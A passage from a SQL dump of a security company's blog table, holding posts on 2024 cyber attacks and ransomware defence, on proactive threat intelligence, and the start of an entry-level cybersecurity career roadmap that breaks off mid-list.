Notable incidents include attacks on major healthcare providers, resulting in disrupted operations and patient care, and breaches within financial institutions that exposed sensitive customer data (Source: CNN).</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Exploited Vulnerabilities Driving Ransomware Proliferation</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ransomware gangs have increasingly leaned on known exploits like Log4j and ProxyShell. These vulnerabilities provide bad actors with a foothold into system networks:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Log4j</strong></b> – A flaw in the Java-based logging library allowing attackers to take full control of target systems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">ProxyShell</strong></b> – A vulnerability in Microsoft Exchange servers that attackers use to gain unauthorized access.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once identified, cybercriminals deploy ransomware, encrypt critical data, and demand hefty ransoms for decryption keys.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Cybersecurity Tips for Proactive Ransomware Defense</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Protect your business against ransomware with these 
strategies:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Regular Patching:</strong></b> Ensure all software is up to date to seal potential weak points.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Frequent Data Backups:</strong></b> Keep secure, isolated backups that can be restored without succumbing to ransom demands.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Employee Training:</strong></b> Conduct regular training focusing on recognizing phishing emails and social engineering tactics.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Supply Chain Attacks – A Growing Threat Vector</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Supply chain attacks have escalated in both frequency and sophistication, posing risks that ripple across entire industries. A single breach in a vendor’s systems can jeopardize all of their clients. 
An infamous example is the SolarWinds attack, where malicious updates deployed through their third-party software exposed vulnerabilities worldwide (Source: Reuters).</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Vulnerabilities in Third-Party Software and Services</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With over 90% of organizations relying on external vendors, attackers frequently exploit these weak links. Common issues include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Unpatched Software:</strong></b> Lack of updates creates opportunities for breaches.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Inefficient Security Practices:</strong></b> Vendors failing to implement robust security measures leave their clients vulnerable.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Strengthening Supply Chain Security</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To fortify supply chain defenses:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Vendor Vetting:</strong></b> Assess vendors’ security protocols carefully before onboarding 
partnerships.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Regular Security Audits:</strong></b> Identify and remediate vulnerabilities through frequent assessments.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Increasing Prevalence of Cloud-Based Attacks</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cloud infrastructure has become a tempting target for attackers as more businesses migrate their operations online. Breaches in cloud security now account for 30% of all incidents in 2024 (Source: Cloud Security Alliance). These attacks often result in compromised sensitive data, tarnishing brand reputations and eroding user trust.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Exploited Weaknesses in Cloud Systems</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Two major issues driving cloud breaches are:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Misconfigurations:</strong></b> Failing to establish proper configuration leaves cloud environments exposed.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Weak Access Controls:</strong></b> Default settings or poor password policies create easy entry points for 
attackers.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Cybersecurity Basics for Securing Cloud Infrastructure</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To strengthen cloud defenses:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Regular Configuration Reviews:</strong></b> Verify that all security settings are optimized.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Multi-Factor Authentication (MFA):</strong></b> Add additional layers of identity verification to prevent unauthorized access.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Web Application Firewalls (WAF):</strong></b> Deploy WAF technology to protect cloud-hosted applications from malicious traffic.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">State-Sponsored Cyberattacks – A Geopolitical Threat</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">State-sponsored cyberattacks have become a significant challenge, with nations employing advanced tactics like social engineering and spear phishing as tools for political objectives.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] 
[&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Sophisticated Techniques and Long-Term Threats</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">State actors often employ Advanced Persistent Threats (APTs) to infiltrate networks and gather intelligence over extended periods. These operations are characterized by:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Spear Phishing:</strong></b> Carefully tailored attacks targeting specific victims to gain access.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Social Engineering:</strong></b> Crafting deceptive scenarios to trick individuals into surrendering sensitive information.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Strengthening National Cybersecurity</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To defend against these threats, countries must prioritize:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Improved Policies:</strong></b> Develop robust cybersecurity strategies to respond to attacks effectively.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong 
class=\"font-bold\">International Cooperation:</strong></b> Collaborate globally to share intelligence and resources for collective defense.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Future Cyber Threats – What Lies Ahead</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Emerging technologies bring new vulnerabilities. Two trends stand out as rapidly evolving threats to track in 2024 and beyond.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">AI-Powered Attacks</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">AI is not only a tool for defense—it’s being weaponized by cybercriminals. Attackers are using AI to automate, scale, and refine their operations, making them faster and more difficult to detect.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">IoT Security Vulnerabilities</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Internet of Things (IoT) devices, from smart home systems to industrial equipment, introduce unique risks. 
Many lack built-in security, creating easy gateways for attackers to breach larger networks.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Preparing for the Next Chapter of Cybersecurity</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To stay ahead of these threats:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Continuous Training:</strong></b> Update cybersecurity teams regularly on new methodologies.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Adaptive Security:</strong></b> Invest in solutions capable of evolving alongside threats.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How Organizations Can Stay Protected</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The surge in cyberattacks in 2024 has made one thing clear—businesses must adopt a proactive approach to secure their systems. 
Here’s what you can implement today to mitigate risks:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Patch Vulnerabilities on Time:</strong></b> Regular updates address critical shortcomings.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Adopt Cybersecurity Solutions like WAFs:</strong></b> Protect web applications from malicious actors.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Focus on Employee Education:</strong></b> Awareness of phishing and social manipulation can be a crucial line of defense.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Conduct Security Audits:</strong></b> Regularly assess and improve your cybersecurity posture.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The battle against cybercrime is an ongoing fight. Staying vigilant, employing proactive measures, and investing in cutting-edge <b><strong class=\"font-bold\">cybersecurity solutions</strong></b> are integral to protecting your business and maintaining customer trust.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"></p>', '', NULL, NULL, 1, 'draft', '2025-01-01 23:37:45', '2026-01-12 21:41:44', 'Information Security', 'Biggest Cyber Attacks of 2024: Exploited Vulnerabilities and Lessons Learned', '', NULL),
(83, 'Proactive Cyber Threat Intelligence: Why Prevention Trumps Reaction', 'proactive-cyber-threat-intelligence-why-prevention-trumps-reaction', 'Cyberattacks are becoming increasingly costly for businesses. In just a year, the average cost of a data breach surged to $4.24 million, a figure that continues to rise. Companies can no longer afford to wait for an attack to happen before they act. Instead, they must adopt proactive measures to safeguard their data and reputation.\r\n\r\nCyber Threat Intelligence (CTI) plays a crucial role in this proactive approach. It involves gathering and analyzing data about potential threats to prevent incidents before they occur. The emphasis on proactive CTI strategies is more vital now than ever.\r\n<h2 id=\"understanding-the-cyber-threat-landscape\">Understanding the Cyber Threat Landscape</h2>\r\n<h3 id=\"the-evolving-nature-of-cyber-threats\">The Evolving Nature of Cyber Threats</h3>\r\nCyber threats are getting more sophisticated. Attackers are employing advanced techniques across various vectors:\r\n<ul>\r\n 	<li><strong>Phishing:</strong> This remains one of the most common methods, tricking users into revealing sensitive information.</li>\r\n 	<li><strong>Ransomware:</strong> Such attacks exploded in frequency, paralyzing organizations until they pay a ransom.</li>\r\n 	<li><strong>Malware:</strong> Diverse types of malware target different vulnerabilities in systems to steal data.</li>\r\n</ul>\r\nThe statistics underscore this trend. Reports indicate that 60% of companies faced a phishing attack in 2022, marking a 20% increase from prior years.\r\n<h3 id=\"the-limitations-of-reactive-security\">The Limitations of Reactive Security</h3>\r\nRelying solely on reactive security can lead to dire consequences. Companies that wait for a breach to respond face significant financial and reputational damage.\r\n\r\nA notable example is Equifax, which suffered a massive data breach affecting 147 million people in 2017. 
The company’s stock plummeted, and they incurred over $4 billion in expenses related to the breach. Equifax reacted only after the incident, a strategy that failed them terribly.\r\n<h3 id=\"the-cost-of-inaction\">The Cost of Inaction</h3>\r\nFinancial losses from data breaches are staggering. The global average cost per record breached is about $161. In contrast, investing in proactive CTI can reduce these costs significantly. Organizations that deploy proactive measures report 40% lower data breach costs compared to those that react after an attack.\r\n<h2 id=\"the-core-components-of-a-proactive-cti-platform\">The Core Components of a Proactive CTI Platform</h2>\r\n<h3 id=\"threat-hunting--detection\">Threat Hunting &amp; Detection</h3>\r\nProactive threat hunting is essential within a CTI platform. Organizations should actively seek out potential threats before they can do damage. For instance, a successful threat hunt led a firm to discover malware that was already in their system, allowing them to neutralize it before any data was lost.\r\n<h3 id=\"vulnerability-management\">Vulnerability Management</h3>\r\nProactive vulnerability management is another critical aspect. Companies must continuously assess their systems for weaknesses. For example, the infamous Heartbleed vulnerability in OpenSSL was exploited by attackers for years before it was patched. Organizations with a robust vulnerability management program could have avoided this issue altogether.\r\n<h3 id=\"security-information-and-event-management-siem-integration\">Security Information and Event Management (SIEM) Integration</h3>\r\nIntegrating SIEM tools enhances threat detection and response capabilities. SIEM collects and analyzes security data in real-time. 
This integration helps organizations to respond quickly to incidents, thus minimizing damage.\r\n<h2 id=\"leveraging-threat-intelligence-for-proactive-defense\">Leveraging Threat Intelligence for Proactive Defense</h2>\r\n<h3 id=\"utilizing-open-source-intelligence-osint\">Utilizing Open-Source Intelligence (OSINT)</h3>\r\nOpen-source intelligence (OSINT) is invaluable for identifying emerging threats. By analyzing publicly available data, organizations can uncover vulnerabilities before they are exploited. For example, a company using OSINT efficiently identified a new malware strain that targeted their sector, enabling early prevention measures.\r\n<h3 id=\"integrating-threat-feeds\">Integrating Threat Feeds</h3>\r\nThreat intelligence feeds offer vital information from various sources. These feeds provide updates on known threats, helping organizations maintain a complete threat picture. Some reputable feeds include those from the Cyber Threat Alliance and Recorded Future.\r\n<h3 id=\"automation-and-orchestration\">Automation and Orchestration</h3>\r\nAutomation tools improve the efficiency of proactive CTI. By automating repetitive tasks, teams can focus on critical thinking. Tools like SOAR (Security Orchestration, Automation, and Response) streamline incident response processes, making them quicker and more effective.\r\n<h2 id=\"building-a-proactive-cti-strategy-actionable-steps\">Building a Proactive CTI Strategy: Actionable Steps</h2>\r\n<h3 id=\"assess-your-current-security-posture\">Assess Your Current Security Posture</h3>\r\nBegin with a comprehensive security assessment. 
Address the following steps:\r\n<ol>\r\n 	<li>Identify current security measures.</li>\r\n 	<li>Evaluate existing vulnerabilities.</li>\r\n 	<li>Review recent security incidents.</li>\r\n</ol>\r\n<h3 id=\"implement-a-robust-threat-intelligence-program\">Implement a Robust Threat Intelligence Program</h3>\r\nKey steps in developing an effective CTI program include:\r\n<ul>\r\n 	<li>Define objectives and goals.</li>\r\n 	<li>Select appropriate tools and platforms.</li>\r\n 	<li>Train staff on threat intelligence usage.</li>\r\n</ul>\r\n<h3 id=\"establish-clear-incident-response-procedures\">Establish Clear Incident Response Procedures</h3>\r\nA well-defined incident response plan is crucial. It should integrate seamlessly with your CTI efforts, enabling your team to react swiftly when an attack is detected.\r\n<h2 id=\"measuring-the-effectiveness-of-your-cti-strategy\">Measuring the Effectiveness of Your CTI Strategy</h2>\r\n<h3 id=\"key-performance-indicators-kpis\">Key Performance Indicators (KPIs)</h3>\r\nTo gauge the success of your CTI strategy, focus on relevant KPIs, including:\r\n<ul>\r\n 	<li>Reduced dwell time (the duration an attacker remains undetected).</li>\r\n 	<li>Improved threat detection rates.</li>\r\n</ul>\r\n<h3 id=\"continuous-improvement\">Continuous Improvement</h3>\r\nContinuous monitoring and evaluation are essential. Regularly review your CTI strategies for effectiveness and efficiency.\r\n<h3 id=\"staying-ahead-of-the-curve\">Staying Ahead of the Curve</h3>\r\nOngoing training is vital for adapting to changing threats. Utilize resources like webinars, online courses, and industry conferences to keep your team informed about the latest developments.\r\n\r\nA proactive CTI approach offers numerous benefits, from reduced risk exposure to minimized financial losses. The shift from reaction to prevention in cybersecurity is no longer optional; it is essential. 
Investing in a robust CTI strategy offers long-term value that protects both data and reputation. Prevent threats, don’t just respond. Your organization’s future depends on it.\r\n<h2 style=\"text-align: center\"><a href=\"https://infoseclabs.io/start/\">Would you like to check the OpenCTI Dashboard? </a></h2>', '', NULL, NULL, 1, 'draft', '2024-12-31 19:53:13', '2026-01-12 21:41:44', 'Information Security', 'Proactive Cyber Threat Intelligence: Why Prevention Trumps Reaction', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(84, 'The Complete Roadmap to Land Your First Cybersecurity Job in 7-10 Months', 'the-complete-roadmap-to-land-your-first-cybersecurity-job-in-7-10-months', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is one of the most in-demand career fields today, offering lucrative opportunities for those with the right skills. If you\'re considering a career in cybersecurity but aren’t sure where to begin, this roadmap will guide you step-by-step through the skills, certifications, and tools you need to land an entry-level role within 7 to 10 months. Whether you\'re new to tech or transitioning from another industry, following these steps will help you build a strong foundation and gain the confidence to enter this exciting field.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 1: Build a Solid Foundation in IT</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Before jumping into cybersecurity, it\'s crucial to have a basic understanding of core IT concepts. 
This step ensures you have the groundwork to troubleshoot, install, and manage basic systems—a prerequisite for working in the field.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Topics to Cover:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Installing Operating Systems</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Managing Common PC Issues</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Networking Essentials</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A great starting point is the <b><strong class=\"font-bold\">CompTIA A+ certification</strong></b>, which covers foundational IT skills. If you commit 3-5 hours of study daily, you can complete this step within 1-2 months. Don’t skip this stage if you’re new to tech—being comfortable with these basics is vital for success.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 2: Learn Computer Networking</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding how networks work is essential because cybersecurity heavily involves securing, monitoring, and even exploiting networks. 
Gaining expertise in computer networking will help you understand how data flows between systems, and how to protect it.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Topics to Focus On:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">OSI and TCP/IP Models</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Common Protocols (HTTP, HTTPS, TCP, etc.)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">IP Addressing and Subnetting</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Routers, Switches, and Firewalls</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For certifications, <b><strong class=\"font-bold\">CompTIA Network+</strong></b> offers an excellent introduction to networking principles, while <b><strong class=\"font-bold\">CCNA (Cisco Certified Network Associate)</strong></b> dives deeper into Cisco-specific concepts and tools. The CCNA is more challenging but carries extra weight on your resume. 
Allocate 1-2 months to this step.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 3: Operating Systems (Windows and Linux)</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Operating systems are at the core of cybersecurity. Most systems you\'ll protect (or investigate) will run on Windows or Linux. Start with one, based on your current familiarity, and then build knowledge in the other.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Learning Areas:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">File Permissions</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] 